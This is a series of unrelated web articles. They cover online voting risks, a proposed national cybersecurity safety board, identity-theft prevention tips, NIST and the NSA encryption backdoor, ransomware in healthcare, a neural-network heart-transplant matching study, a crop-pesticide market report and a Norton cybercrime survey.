Even if a system of secure ID cards and compatible web access devices were to be implemented, there is still a substantial challenge in securing the portals used to collect votes. Not only would the servers need to be physically secured, the software necessary to tabulate the votes would have to be bulletproof. Given that flexibility for the portals would be a universal demand, and that the agencies which perform the voting collection have insufficient resources to secure the portals, massive fraud is almost guaranteed – by internal and external perpetrators alike.
For those of us familiar with the promise and perils of online technologies, it’s clear that these tools are effective in sharing information and can serve well in soliciting input for the government. However, when it comes to collecting votes the balance between security and convenience means that our current system of voting by physical presence is the only real choice.
Why We’re Not Ready for Online Voting
And, it could be many years before online voting becomes reality because:
- Universal citizen ID cards are a political third rail given our desire for personal privacy and the inevitable association that these cards have with WWII Gestapo agents demanding to see citizens’ personal papers.
- Even if universal citizen IDs became politically acceptable, we currently lack the resources to create the IT infrastructure needed for secure, real-time electronic voter data collection.
Given these realities, it appears that online voting is one area that’s not quite ready to benefit from the boundless potential of technology. For now, at least, it seems paper ballots and our physical presence provide the most tamperproof solution for our participatory democracy. | <urn:uuid:1f6dd7c9-1ff8-40f6-bb23-519e9d979220> | CC-MAIN-2017-04 | http://www.identityweek.com/not-ready-for-online-voting/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281659.81/warc/CC-MAIN-20170116095121-00032-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.942396 | 591 | 2.8125 | 3 |
In his book The Psychological Edge: Strategies For Everyday Living, clinical psychologist Dr. Samuel Shein writes that while we have a National Transportation Safety Board (NTSB), there is no National Psychological Research Board (NPRB). A group like the NPRB could investigate national disasters caused by those with psychological issues.
Even with tragedies such as the Columbine High School and Sandy Hook Elementary School massacres, the Heaven's Gate mass suicide, 9/11 and more, the US still lacks a central agency that deals with psychological-based tragedies. Creating a NPRB could be crucial to avoid future tragedies and senseless deaths.
With regards to information security, the Sony breach of 2014 shows that the time has arrived to create a National Cybersecurity Safety Board (NCSB). The debacle of the FBI prematurely attributing the attack to the North Korean government is still causing embarrassment, especially to information security professionals who note that attribution, and determination of root cause and probable cause, takes time to determine.
As for the NTSB, in 1967 Congress established it as an independent agency placed within the Department of Transportation (DOT). Based on that, the NCSB would likely be placed within the Department of Commerce, the Federal Trade Commission or, most likely, the Department of Homeland Security.
In creating the NTSB, Congress envisioned that a single organization with a clearly defined mission could more effectively promote a higher level of safety in the transportation system than the individual modal agencies working separately.
In 2000, the NTSB embarked on a major initiative to increase employee technical skills and make its investigative expertise more widely available to the transportation community by establishing the NTSB Academy at George Washington University. To date, it has issued over 13,000 safety recommendations to more than 2,500 recipients.
Based on the success of the NTSB, I think an NCSB could perform similar tasks when it comes to information security. Transportation disasters and security breaches have many parallels, and by having a body to investigate information security breaches and advise on security safety, the entire industry would benefit.
What would an NCSB look like? As a start, when an investigation of a major breach occurred, an NCSB go team composed of specialists in the relevant fields would be dispatched. The go team would include experts in the following areas: malware, digital forensics, application security, network security, network infrastructure, operating systems and more. They would work in concert with the breached organizations and affected vendors.
Like the NTSB, the NCSB would determine if it needs to hold a public hearing on the breach. After all that is done, it would publish a final report and issue security recommendations. Like the NTSB, the NCSB would likely not have any legal authority to implement, or impose, its recommendations. That burden would fall upon regulators at either the federal or state level.
The NTSB also has a Most Wanted List, which represents the agencies’ advocacy priorities, designed to increase awareness of, and support for, the most critical changes needed to reduce transportation accidents and save lives. The NCSB would also issue its annual cybersecurity most wanted list.
Creating the NCSB on the model of the NTSB would be a benefit to every US organization. Even after megabreaches at Anthem, Heartland Payment Systems, Evernote, TJX, Target, Home Depot, Sony and more, we still find ourselves in early 2015 at a standstill when it comes to breach information sharing, cause determination and proposed recommendations.
Creating an NCSB is an idea whose time has come. If it does get created, it will be a crucial step in the growth and maturity of information security.
Ben Rothke CISSP is with Nettitude and the author of Computer Security: 20 Things Every Employee Should Know. | <urn:uuid:834a3df3-2a6a-4def-b141-9b783287322c> | CC-MAIN-2017-04 | http://www.csoonline.com/article/2886326/security-awareness/it-s-time-for-a-national-cybersecurity-safety-board-ncsb.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280850.30/warc/CC-MAIN-20170116095120-00060-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.951004 | 773 | 2.8125 | 3 |
Identity thieves use a varied array of methods to get their hands on your personal information. To prevent identity theft, follow these simple guidelines:
Protect your online privacy
The internet has become the primary target of modern day identity thieves. While you can’t stop a data breach at a bank or retailer that affects thousands of customers, you can take a few steps to beef up your individual online security to keep thieves at bay. Whenever you input personal information into a form online, always check that the web page is encrypted with HTTPS and presents a valid certificate. The “https” will appear at the start of the site’s URL shown at the top of your browser. Invest in other protections as well, such as an antivirus and a VPN. These prevent viruses and snoops from monitoring and collecting your activity. To help you out, we made a big list of free tools you can use to protect your privacy.
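For the technically inclined, a site's certificate can also be checked programmatically. The sketch below uses only Python's standard library, and the hostname is just a placeholder, not a recommendation.

```python
import socket
import ssl

def check_certificate(hostname, port=443):
    """Open a TLS connection and return the server certificate if it validates."""
    context = ssl.create_default_context()   # validates against the system trust store
    with socket.create_connection((hostname, port), timeout=5) as sock:
        with context.wrap_socket(sock, server_hostname=hostname) as tls:
            return tls.getpeercert()          # raises ssl.SSLError if validation fails

cert = check_certificate("www.example.com")   # placeholder hostname
print(cert["subject"], cert["notAfter"])      # who the cert was issued to, and its expiry
```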
Avoid phishing scams
Ignore any unsolicited requests for your personal information, whether they come by mail, email, or some other medium. These scams will attempt to lure you in with some sort of promotional offer, or attempt to scare you into giving up information by telling you that your assets are at risk. Remember that reputable companies will never ask you for your social security number, card numbers, or other personal info over the phone or by mail.
Guard your social security number
Don’t carry around your social security card or any documents containing your social security number. The same goes for your National Insurance number if you’re a UK citizen and social insurance number for Canadians. Keep it and other vital documents locked and hidden somewhere safe. Don’t give out your number unless absolutely necessary and you 100 percent trust in the entity receiving it. Your social security/national insurance/social insurance number is the most critical piece of private information you have, so guard it well.
Monitor your accounts for unauthorized transactions
Compare receipts with your account statements to make sure everything matches. If you use online banking, check your account activity often for unauthorized or fraudulent purchases, withdrawals, and transfers. Pay close attention to billing cycles as well. If your credit card bill arrives late, for instance, a thief could have changed your address without your knowledge, then forwarded you the bill after tampering with it. If a bill is late, contact the original sender to inquire about why.
Shred mail and paperwork with identifying information
Don’t throw paperwork, bills, and mail with your information in it into the trash without first shredding or otherwise destroying it. Dumpster diving is a classic tactic used by identity thieves to steal info. While we’re at it, make sure to collect your mail promptly and don’t let it sit in your mailbox for a long period of time. Have a trusted neighbor collect your mail on your behalf if you leave for an extended period of time to prevent thieves rifling through your mailbox.
Create strong passwords
“123456” and “password” don’t cut it when it comes to online passwords. The longer the password, the better. Include numbers and symbols as well to prevent computer programs from brute forcing your account–essentially guessing every possible combination until the correct string of characters is correct. Don’t use the same passwords for every website. Consider using a password manager app so you can make passwords unique without having to memorize them. Read more about creating strong passwords in our guide.
Be wary of shoulder surfers and skimmers
Whenever you use an ATM or keypad at a cash register, keep an eye out for people who try to sneak a peek at your PIN. Cover the keypad with your other hand. Be wary of skimmers: devices that scan your card’s magnetic strip. Skimmers can be fixed onto ATMs to make it look as though they are part of the original machine, or used by store clerks and waiters to swipe your card a second time when you’re not looking. If possible, upgrade to bank and credit cards with chips instead of just magnetic strips.
Order your credit report once per year
Under US law, citizens are entitled to one free credit report per year from each of the national credit bureaus. Check these reports for any accounts you did not open and other discrepancies. Once your credit has been tarnished, it can be very difficult to mend it.
UK citizens don’t get free credit reports, but credit reporting agencies often offer free trials that you can avail of or only require you pay postage to receive a hard copy.
Canadians can get their credit reports free in the mail, but the process takes two to three weeks. If you want instant online access, that will cost extra.
Invest in identity theft protection
Several companies offer subscription services that will monitor your accounts, help restore your identity, and provide insurance to compensate for damages as a result of identity theft. Learn more about identity theft protection and read our reviews of these services on Comparitech. Most of our reviews are for US-only providers for now, as this is where commercial identity theft protection is most popular, but we hope to add more international options in the future. US citizens can check out our list of the best identity theft protection services here.
“Suit of Armor” by Erik Drost licensed under CC BY 2.0 | <urn:uuid:91c775f5-2b1e-4be1-9f2d-5ca4408d778c> | CC-MAIN-2017-04 | https://www.comparitech.com/identity-theft-protection/guides/how-to-protect-yourself-from-identity-theft/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281746.82/warc/CC-MAIN-20170116095121-00454-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.92193 | 1,097 | 2.65625 | 3 |
NIST's future without the NSA
Will the National Institute of Standards and Technology break its close relationship with the National Security Agency in developing cryptographic and cybersecurity standards? That seems very likely following a recent report by an outside panel of experts, and it will have implications for federal agencies.
The report by the Visiting Committee on Advanced Technology (VCAT), which was released July 14, came after last year’s revelation as a part of the Edward Snowden leaks that the NSA had inserted a “backdoor” into a NIST encryption standard that’s used to generate random numbers. NIST Special Publication 800-90A, the latest version published in 2012, describes ways for generating random bits using a deterministic random bit generator (DRBG). That’s an important step for many of the cryptographic processes used to secure computer systems and protect data.
The backdoor allowed the NSA to basically circumvent the security of any system it wanted to get data from, and that could be a substantial number. The DRBG was used as the default in RSA’s FIPS 140-2 validated BSAFE cryptographic library, for example, before that was ended in 2013. Up until then, BSAFE had been widely used by both industry and government to secure data.
The main damage done by these revelations is not in whatever data the NSA managed to extract because of this, but in the confidence organizations will have in what NIST does in cybersecurity going forward. And for government agencies that’s critical, since they are required by law to adhere to the standards NIST puts out.
NIST removed the offending DRBG algorithm from 800-90A in April and reissued the standard. It advised federal agencies to ask vendors whose products they used if their cryptographic modules rely on DRBG and, if so, to ask them to reconfigure those products to use alternative algorithms.
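NIST's advice was about reconfiguring affected products, not about writing new code, but as a general illustration of the safer pattern: applications can draw key material from the operating system's own vetted randomness source rather than from an application-level DRBG of uncertain provenance. A minimal Python sketch:

```python
import secrets

# Draw key material from the OS CSPRNG (e.g. /dev/urandom on Linux),
# rather than from an application-level DRBG whose provenance is uncertain.
aes_key = secrets.token_bytes(32)       # 256-bit key material
session_nonce = secrets.token_hex(16)   # 128-bit nonce, hex-encoded

print(len(aes_key), session_nonce)
```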
But the damage has been done. Not only do other NIST standards developed in coordination with the NSA now need critical review, according to VCAT committee member Ron Rivest, a professor at MIT, but the process for developing future standards needs reassessment and reformulation.
As Edward Felten, a professor of computer science and public affairs at Princeton University and another of the VCAT members, wrote in the committee’s report, if government has to conform to NIST standards, but everyone else uses something different, it “would be worse for everybody and would prevent government agencies from using commercial off-the-shelf technologies and frustrate interoperation between government and non-government systems.”
Simply put, that’s not possible. Government is no longer in the position of being able to develop systems for its own use and depends absolutely on commercial products. So, the scramble to shore up NIST’s reputation is on.
NIST says it has already instituted processes to strengthen oversight of its standards making, and could make more along the lines of the recommendations made in the VCAT report. Congress got in on the act a few months ago with an amendment to the FIRST Act, a bill to support science and research, that strips the requirement in law that NIST consult with the NSA when developing information security standards.
However, it still allows NIST to voluntarily consult with the NSA, something the VCAT report also goes to some lengths to recommend. That’s a tacit admission that NIST and the government overall can’t do away with NSA input on security. There have been suggestions that the NSA’s role in information assurance should be given over to the Department of Homeland Security or the Defense Department, but that seems unlikely.
The fact is that the NSA probably has the greatest depth of expertise in cryptography and security in the entire government, and both the DHS and DOD rely on it as much as NIST does. How to reconcile all of that while urgently repairing the trust that’s needed of NIST and its standards, both in government and industry, will be one of the more fascinating things to watch over the next few years.
Posted by Brian Robinson on Jul 18, 2014 at 10:22 AM | <urn:uuid:9cdb02d9-a3ec-4e9a-9a24-d9e926424548> | CC-MAIN-2017-04 | https://gcn.com/blogs/cybereye/2014/07/nist-nsa-encryption.aspx?admgarea=TC_SecCybersSec | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280718.7/warc/CC-MAIN-20170116095120-00574-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.959042 | 846 | 2.546875 | 3 |
One of the biggest stories in the IT security world in February was that of the ransomware attack on a Los Angeles hospital that reportedly had doctors and other healthcare personnel locked out of patients’ records and unable to even communicate via email for over a week. This incident highlights a growing – and scary – trend in the escalation of cybercriminals’ money-motivated attacks that formerly targeted individual computer users but is now aiming higher, at businesses and institutions whose records are so vital they may be compelled to pay whatever the attackers demand for their release.
The practice of seizing someone or something and demanding that those who want the person or item back pay for it is an age-old type of extortion. The payment is known as ransom, which comes from the old French word rançon and means “buying back.”
Hostage-taking for ransom has a long and colorful history. Julius Caesar was said to have been kidnapped and held for ransom by pirates at the age of twenty-five. True to form, when he found out the pirates were asking for 20 talents of silver to release him, he declared himself worth more and had them up the ransom to 50 talents. John Paul Getty’s sixteen-year-old grandson was held for ransom by an Italian gang in 1973 and his ear cut off and mailed to the press. He was released after payment of $3 million. The 20-month-old baby of Charles Lindbergh was kidnapped in 1932. Despite 13 ransom notes and the payment of ransom, the baby’s body was found a few miles from the family’s home and a long-running FBI investigation resulted in the arrest, trial and execution of Bruno Richard Hauptmann.
Kidnapping humans is a difficult undertaking. In our digital age, there’s an easier way for criminals to extort money from individuals and companies: they can take our precious data hostage or hold our entire networks hostage. They do this by means of malicious software known as ransomware, and some very smart people are falling victim to it.
As the “computer experts” and unofficial tech support for almost everyone we know, my husband and I have had multiple friends and family members contact us with the frantic news that all their data has been rendered inaccessible and they’re getting messages telling them they have to pay to unlock it. Some of these are highly educated folks whom you wouldn’t expect to fall for a con job – yet they’ve paid the ransom, only to discover that as with the Lindbergh kidnapper, criminals often don’t keep their end of the bargain.
Ransomware has been around for at least a quarter of a century and started to proliferate around 2005-2006. Some of the first variants were simple “scareware” but the attackers haven’t gotten more serious, and today’s CryptoWall and CryptoLocker are a good deal more sophisticated – and harder to crack – than the early attempts. Modern ransomware comes in a variety of types but the common factor is that they all prevent you from doing what you want to do on your computer unless you do what the malware demands (which may be sending money – usually in the form of bitcoins – or can be as innocuous as filling out surveys).
One thing that makes ransomware so prevalent is that it can sneak up on a system in many different ways: some infestations are accomplished via botnets, and many utilize the good old tried-and-true methods of email links and attachments and social engineering tactics. Ransomware can be spread through messenger/chat programs or even via infected USB thumb drives and other removable media. An especially popular method for modern attackers is to distribute the payload through “drive-by” downloads and “malvertising” (malicious advertising). While safe surfing habits are always advised, even those who are diligent may still get caught in the ransomware net since any website that accepts user-uploaded content can be compromised and used to pass along the malware, including legitimate popular sites. Think you’re safe because you use a Mac? Think again.
Some ransomware programs will just encrypt your data. If you have backups of the data (that haven’t been overwritten with encrypted copies), you might luck out. Other types of ransomware will lock up your computer and prevent you from accessing the operating system and/or your applications. The more sophisticated ransomware can hide itself from anti-malware software to avoid detection.
It’s bad enough when Aunt Mary finds that all 8,250 photos of the grandkids she had stored on her hard drive are no longer accessible (and of course those were the only copies). It’s worse when your best friend calls you in desperation because all his tax files have been encrypted and when he restored his backup, that external drive got infected, too. But none of that compares to the havoc that ransomware can wreak when it attacks an organization that relies on its computer systems and data for life-and-death decision-making, such as those in the healthcare industry.
Hollywood Presbyterian Medical Center was the victim of such an attack last month, and the digital hostage-takers shut down access to the hospital’s computer systems and then wanted $3.6 million to let it go. The institution ended up paying, although reportedly much less than the original demand. There were also reports that some patients in the hospital’s emergency room were sent to other hospitals because HPMC was unable to register them or access their medical records.
This case ended up getting a great deal of publicity, but some experts speculate that it was by no means an isolated incident. Obviously no organization – whether a public entity, private company or non-profit – wants it splashed all over the Internet that they have been victimized in this way. It’s embarrassing, it can cause customers to lose confidence in them, and it could subject them to scrutiny regarding whether they did all they could have to prevent it, especially in a regulated industry such as those that fall under HIPAA laws. In the U.S., HIPAA violations are a very big deal that can result in both civil and criminal penalties.
Ransomware is just one of the many times of breaches that can impact hospitals, doctors’ offices, labs and other healthcare-related businesses. According to Travis Greene writing in SecurityWeek last summer, from 2014 to 2015 security breaches in the healthcare arena increased by 60 percent and the cost of a healthcare industry breach went up by a whopping 282 percent. The Ponemon Institute’s data showed that as of last October, criminal attacks in healthcare had become the leading cause of data breaches.
Technological innovations have been responsible for “medical miracles” and new cutting-edge tech such as artificial intelligence (AI) and 3D printing are revolutionizing healthcare. The computerization of medical records can cut costs for storing huge amounts of information and make it orders of magnitude easier for physicians to have patients’ medical histories, medication information and other relevant data at their fingertips in order to more quickly formulate a better treatment plan. However, when those records are stored on a networked computer or NAS or SAN, it also exposes this very personal information to the risk of unauthorized access or worse, tampering that could put lives in danger.
In addition to making medical records inaccessible and thus possibly delaying life-saving treatment, attackers could make changes to prescription dosages, erase or change patient histories to omit or add information that causes an incorrect diagnosis or prognosis, make a person’s illnesses public in order to cause embarrassment (such as in the case of sexually transmitted diseases) or affect the person’s career (such as a revelation of past psychiatric treatment of a person running for political office). Cybercriminals can also sell stolen medical records, which the FBI warned a couple of years ago are even more valuable than credit card information on the black market.
That’s why cybersecurity should be a top priority for all IT departments and data centers that serve the healthcare field. Strong encryption and multi-factor authentication, along with strict audit trails, should be standard in the healthcare IT world. But a convergence of technological trends and innovations makes securing healthcare data more complicated than that.
When we think of the Internet of Things (IoT) and the security issues it brings, many of us just think of household appliances and perhaps smart watches, IP cameras, Internet-enabled TVs and connected cars. However, there are a myriad of specialized medical devices that now connect to the Internet and thus are vulnerable to remote access and hack attacks, or, as the Washington Post put it, The Internet of Things that Can Kill You. These range from pacemakers inside heart patients’ chests to infusion pumps that deliver insulin or narcotics to robotic arms that can be used to perform surgery remotely.
Not only could these devices be hacked to directly harm the patients who are using them, but because they’re often connected to hospital networks, they could be used as a back door to gain access to the entire network if there are vulnerabilities in the software and/or they’re not configured properly – and as we’ve discussed before, many of the “things” that are becoming Internet-capable are made by vendors whose expertise lies in the primary purpose of the device and not in cybersecurity. Many embedded devices aren’t updated regularly so vulnerabilities don’t get patched, and the fierce competition (and big profits to be made) in this space may lead manufacturers to rush to get their devices on the market before they’ve been thoroughly secured.
No wonder some security experts declared that 2015 was the “year of the healthcare hack,” with studies showing that healthcare and pharmaceutical companies have the worst cybersecurity record among the S&P 500. But in 2015, healthcare hackers (and hostage-takers) were just getting started. If the industry doesn’t make a concerted effort to focus on security now, 2016 could be even worse. | <urn:uuid:3bae4e42-536b-4433-8416-d52ea145b37c> | CC-MAIN-2017-04 | https://techtalk.gfi.com/holding-healthcare-hostage-the-state-of-security-in-the-medical-industry/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282631.80/warc/CC-MAIN-20170116095122-00142-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.963929 | 2,056 | 2.53125 | 3 |
Jenny learned to watch for warning signs during her pregnancy by studying her family health history. Jane launched a personal healthy living campaign when she realized she couldn't "wish" herself healthy. Like Jane and Jenny, thousands more Utahns have health stories that highlight their hopes, strengths, and struggles. Now, there is a place online where all those stories can be shared: http://health.utah.gov/bhp/sb/.
The Utah Health Story Bank project is led by the Utah Department of Health (UDOH) Bureau of Health Promotion (BHP). BHP programs are responsible for health education campaigns focusing on prevention and control of chronic diseases like diabetes, heart disease and obesity. Health professionals know that shared experiences can be valuable tools in convincing people to make changes in their personal health behavior.
"We're very happy to be launching this innovative tool," says Heather Borski, BHP director. "It gives Utahns an opportunity to share their health stories, and their stories will help us demonstrate to others the important, tangible and personal impacts of our programs."
Those who'd like to share stories can go to the UDOH Web site (http://health.utah.gov) and click on the 'Utah Health Story Bank' icon. Once at the story bank, they can register and then submit their story. All stories will be kept confidential and will only be shared with the public, legislators, or other health professionals with express permission from the person submitting the story.
Storytelling is a time-tested teaching practice used to share messages and make them memorable. The method has been found effective in a variety of informal and formal settings.
"Few things motivate people to change their lives for the better than success stories from real people, folks they can relate to as fellow human beings," says Dr. David Sundwall, UDOH executive director. "Statistics and scare tactics often don't have the intended impact, but stories from others' lives can make a big difference."
Jenny Johnson of the BHP Genomics program was motivated to start the story bank by her own experience. "We had collected a few stories in the past and used them to teach other Utahns about the importance of knowing their family health histories," said Johnson. "We could have taught people the same thing with lectures and data, but it's only when we put a face on the issue that we find we touch others' lives. We're excited to have this resource and hope Utahns will feel pride in sharing their experiences."
There is no limit on the number of stories a person may submit to the story bank, and one does not have to suffer from heart disease, asthma or another chronic disease to share a health story. One may share his or her experiences with traumatic injury or domestic abuse, as well. All stories will be screened for appropriate language and content. | <urn:uuid:2c7de669-815d-4a21-9529-df54c604fc21> | CC-MAIN-2017-04 | http://www.govtech.com/health/Utah-Department-of-Health-Launches-Online-Story_Bank.html?topic=117677 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281001.53/warc/CC-MAIN-20170116095121-00015-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.965871 | 581 | 2.578125 | 3 |
The Asia-Pacific crop protection chemicals market has been estimated at USD 14.4 Billion in 2015 and is projected to reach USD 20.3 Billion by 2020, at a CAGR of 7.13% during the forecast period from 2015 to 2020. Crop protection chemicals also called pesticides constitute a class of agrochemicals that are used to kill plant-harming organisms like pests, weeds, rodents, nematodes etc., and preventing the destruction of crops by them. Any material or mixture that is capable of preventing, destroying, repelling or mitigating a pest can be called pesticide. Herbicides, insecticides, insect growth regulators, nematicides, termiticides, mollusicicdes, piscicides, avicides, rodenticides, predacides, bactericides, insect repellants, animal repellants, antimicrobials, fungicides, disinfectants, sanitizers and their bio counter parts all come under the classification of pesticides.
Pesticides are used in crops as well as non-crop plants like turfs and ornamentals. They can be broadly classified into four groups depending on their usage. Farmers use herbicides for killing unwanted plants called weeds, insecticides for killing insects, fungicides for treating diseases caused by fungus and other pesticides for treating diseases, which are not caused by fungi or insects. Herbicides accounted for more than 53.5% of total pesticides sales in 2015.
Pesticides market is driven by the need to increase crop yield and efficiency. The region’s population is growing rapidly, but the farmlands have been decreasing pushing farmers to increase their yields. New farming practices are adopted by farmers to increase crop yields. Genetically modified (GM) plants have helped farmers increase their yields coupled with the reduction of use in some pesticides. Bio pesticides adoption is also occurring all over the world, especially in developed and some developing countries. Demand for organic and completely natural foods is increasing at a stellar rate and inevitably bio pesticides consumption has to be increased. Pesticides help in optimal usage of resources for plant growth and protect the crop from various pathogens. Some pesticides repel animals coming towards them with the help of pheromones. The usage of generic pesticides in this region is high especially in rapidly growing markets like China and India. These markets are suitable for generic pesticide manufacturers. New farming practices require new crop protection products. The research and development costs are escalating. For previously mentioned reasons, investment for companies is high on new products and they are wary of returns. Per capita usage of pesticides is low in some developing countries because of costs. This poses a threat to companies, as their market reach might not follow desired growth patterns. Shrinking farmlands are also threat in the form of less usage of pesticides. In countries like Japan, pesticides usage is saturated and a reduction in agricultural land will definitely bring down pesticides usage as well.
The market is classified based on the application into herbicides, fungicides, insecticides and other pesticides. They are further segmented depending on their chemical origin: bio pesticides and synthetic pesticides. Diverse pesticides range is used in agriculture and farming. Pesticides are also segmented by their usage in crops like cereals, fruits etc. Non-crop utilization of pesticides in turfs, ornamentals and others is also studied. Market study indicated that Cereals and grains consumed the highest market in the use of pesticides. This can be attributed to the food safety and wide variety of uses of cereals and grains.
The market is also segmented geographically into China, India, Japan, Australia and others. China has the largest consumer base in this region. Australia and Japan followed the list. The rising disposable income levels, rising population and food security have made India, the country with maximum potential for growth. The low affordability and explicit cost cutting measures of farmers in developing countries hinder the real potential of the market.
Decreasing farmlands and increasing population pose a serious threat to food security. Recently, grains are also used to produce bio fuel and this poses a risk to food security especially in developing countries where price drastically influences consumption. Pesticides help to increase farm yields and still have a large scope to improve the overall agricultural production of the world. The major companies in crop protection chemicals are Bayer, BASF, DuPont, Dow agrosciences, Syngenta, Monsanto, UPL etc. The current trend to survive in the market is the research and innovation route for major companies. Lot of small and growing companies are currently using generic pesticides to increase their sales revenue. All major companies are investing profoundly in new product development to keep up with competition to gain market share and increase their revenue. Pesticides were prominent for increased agricultural yields and will remain so in the coming years.
Key Deliverables in the Study | <urn:uuid:c4cb12c4-07fc-4e36-9ba2-3e9f25f9a95f> | CC-MAIN-2017-04 | https://www.mordorintelligence.com/industry-reports/asia-pacific-crop-protection-pesticides-market-industry | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281424.85/warc/CC-MAIN-20170116095121-00501-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.954374 | 975 | 3.046875 | 3 |
Health care analytics is an emerging application area that promises to help cut costs and provide better patient outcomes. To reach that goal though requires sophisticated software that can mimic some of the intelligence of real live physicians. At Lund University and Skåne University in Sweden, researchers are attempting to do just that by building a model of heart-transplant recipients and donors to improve survival times.
The so-called “survival model” is designed to discover the optimal matches between recipients and donor for heart transplants. It takes into account such factors as age, blood type (both donor and recipient), weight, gender, age, and time during a transplant when there is no blood flow to the heart. Just analyzing those six variables leads to about 30,000 distinct combinations to track. When you want to match tens of thousands of recipients and donors across that spread of combinations, you need a rather sophisticated software model and some serious computing horsepower.
To build the application, the Lund researchers used MATLAB and a set of related MathWorks libraries, namely the Neural Network Toolbox, the Parallel Computing Toolbox, and the MATLAB Distributed Computing Server. With that, they built their predictive artificial neural network (ANN) models, in this case, a simulation that predicts survival rates for heart transplant patients based on the suitability of the donor match. The ANN models are “trained” using donor and recipient data encapsulated in two databases: the International Society for Heart and Lung Transplantation (ISHLT) registry and the Nordic Thoracic Transplantation Database (NTTD).
The key software technology for the ANN application is MathWorks’ Neural Network Toolbox. The package contains tools for designing and simulating neural networks, which can be used for artificial intelligence-type applications such as pattern recognition, quantum chemistry, speech recognition, game-playing and process control. These types of application don’t lend themselves easily to the type of formal analysis done in traditional computing.
For the ANN models, training involves correlating donor and recipient data, such that the risk factors are weighted accurately. If done correctly, the simulations can become adept at associating these factors with the heart transplant survival rates. In this case, the results from the simulations were used to pick out the best and worst donors for any particular recipient.
The ultimate goal is to determine the mean survival times after transplantation for waiting recipients, so that doctors can make the best possible decision with regard to matches. In the research study, they analyzed about 10,000 patients that had already received transplants in order to verify the accuracy of the algorithms.
What they found was that the ANN models could increase the five-year survival rate raised by 5 to 10 percent compared to the traditional selection criteria performed by practicing physicians. Perhaps more importantly, using a randomized trial based on preliminary results, approximately 20 percent more patients would be considered for transplantation under these models, says Dr. Johan Nilsson, Associate Professor in the Division of Cardiothoracic Surgery at Lund University.
Because of the combinatorial load of the recipient-donor variables, the models are very compute-intensive. On a relative small cluster, the MATLAB-derived ANN simulation took about five days. That was significantly better the open source software packages (R and Python) they started out with. Under that environment, runs took about three to four weeks and were beset with crashes and inaccurate results.
To run the simulation, the researchers used a nine-node Apple Xserve cluster (which includes a head node and a filesharing node), along with 16 TB of disk, all lashed to together with a vanilla GigE network. Memory size on the nodes ranged form 24 to 48 GB. According to Nilsson, with the latest MATLAB configuration, they use 64 CPUs to run the ANN simulation.
Nilsson, who is a physician, programmed the application himself, noting that the MATLAB environment was easy to set up and use, adding there was no need for deep knowledge of parallel computing. The biggest roadblock he encountered was the need to customize an error function (MATLAB Neural Network does not have any cross-entropy error routine.) There were also some problems encountered in setting up the Xserve cluster, but once they replaced Apple’s Xgrid protocol with the MATLAB Distributed Computing Server, many of those problems disappeared.
The Apple Xserve cluster is not exactly state of the art for high performance computing these day. Presumably with a late model HPC setup, they could cut the five-day turnaround time for the simulation even more, which would speed up the research even further.
In the short term, the Lund and Skåne team intend to continue to optimize the software and explore other solutions like regression tree and logistic regression algorithms, as well as add support for vector machines. In parallel, they want to start transitioning the technology into a clinical setting.
According to Nilsson, once they’ve fully cooked the models, they can do away with the high performance computing environment. “In a future clinical setting,” he says, “the application could be used on any desktop computer, and the matching process will take only seconds to a couple of minutes.” | <urn:uuid:02854bd9-715e-47e2-99fd-b56f4f212513> | CC-MAIN-2017-04 | https://www.hpcwire.com/2011/09/13/hpc_bests_physicians_in_matching_heart_transplant_donors_and_recipients/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282935.68/warc/CC-MAIN-20170116095122-00409-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.943311 | 1,073 | 3.03125 | 3 |
A new Norton Study of 7,000 Web Users Is First to Gauge Emotional Impact of Cybercrime; Victims Feel Ripped Off ... and Pissed Off .
Two-thirds (65 percent) of Internet users globally, and almost three-quarters (73 percent) of U.S. Web surfers have fallen victim to cyber-crimes, including computer viruses, online credit card fraud and identity theft.
As the most victimized nations, America ranks third, after China (83 percent) and Brazil and India (tie 76 percent). That victims' strongest reactions are feeling angry (58 percent), annoyed (51 percent) and cheated (40 percent), and in many cases they blame themselves for being attacked.
Only 3 percent don't think it will happen to them, and nearly 80 percent do not expect cyber-criminals to be brought to justice- resulting in an ironic reluctance to take action and a sense of helplessness...
Relating to that - US White Housepublished a Draft on "National Strategy for Trusted Identities in Cyberspace Creating Options for Enhanced Online Security and Privacy".
Few quotes from this document:
"Cyberspace - the interdependent network of information technology components that underpins many of our communications - is a crucial component of the Nation's critical infrastructure. We use cyberspace to exchange information, buy and sell products and services, and enable many online transactions across a wide range of sectors, both nationally and internationally. As a result, a secure cyberspace is critical to the health of our economy and to the security of our Nation. In particular, the Federal Government must address the recent and alarming rise in online fraud, identity theft, and misuse of information online."
The Strategy's vision is:
Individuals and organizations utilize secure, efficient, easy-to-use, and interoperable:
Identity solutions to access online services in a manner that promotes confidence, privacy,choice, and innovation.
Fraudulent transactions within the banking, retail, and other sectors along with intrusions against the Nation's critical infrastructure assets that are essential to the functioning of our society and economy (utilities, transportation, financial, etc.) are all too common.
As more commercial and government services become available online, the amount of sensitive and financial data transmitted over the Internet is ever increasing.
Consequently, the probability of loss associated with data theft and corruption, fraud, and privacy breaches increases as well. The poor identification, authentication, and authorization practices associated with these identity solutions are the focus of this Strategy.
Identity Solutions will be Secure and Resilient:
Securing identity solutions against attack or misuse is paramount. Security ensures the confidentiality, integrity, and availability of identity solutions: Strong cryptography, the use of open and well-vetted security standards, and the presence of auditable security processes are critical to the trustworthiness of an identity solution.
Identity solutions should have security built into them such that they detect and prevent intrusions, corruption, and disruption to the maximum extent possible.
Identity solutions should be resilient, able to recover and adapt to drastic or abrupt change. Identity Solutions will be Cost-Effective and Easy To Use. Identity solutions should be simple to understand, intuitive, easy to use, and enabled by technology that requires minimal user training."
